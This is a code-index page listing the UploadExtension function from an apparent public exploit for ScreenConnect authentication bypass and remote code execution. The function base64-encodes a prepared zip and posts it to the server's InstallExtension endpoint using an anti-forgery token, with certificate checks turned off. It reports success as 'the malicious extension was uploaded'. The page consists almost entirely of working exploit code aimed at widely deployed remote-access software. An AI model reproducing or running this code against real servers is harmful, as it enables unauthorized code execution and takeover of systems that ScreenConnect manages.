MCPcopy Index your code
hub / github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE / UploadExtension

Function UploadExtension

ScreenConnect-AuthBypass-RCE.py:98–116  ·  view source on GitHub ↗
(url, anti_forgery_token)

Source from the content-addressed store, hash-verified

96 zip_resources.close()
97
98def UploadExtension(url, anti_forgery_token):
99 with open("resources.zip", "rb") as f:
100 zip_data = f.read()
101 zip_data_base64 = base64.b64encode(zip_data).decode()
102 headers = {
103 "X-Anti-Forgery-Token": anti_forgery_token,
104 "Content-Type": "application/json",
105 "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
106 }
107 url = url + "/Services/ExtensionService.ashx/InstallExtension"
108 session.cookies.update({"settings": "%7B%22collapsedPanelMap%22%3A%7B%22Inactive%22%3Atrue%7D%7D"})
109 try:
110 response = session.post(url=url, data=f"[\"{zip_data_base64}\"]", headers=headers, verify=False, proxies=proxy)
111 if response.status_code == 200:
112 print(f"[+] The malicious extension was uploaded successfully, with the ID: {plugin_guid}")
113 else:
114 print("[-] Malicious extension upload failed, please check the network and try again or try to exploit manually")
115 except Exception as err:
116 print("[-] Error in func <UploadExtension>, error message: " + str(err))
117
118def ExecuteCommand(url):
119 try:

Callers 1

Calls

no outgoing calls

Tested by

no test coverage detected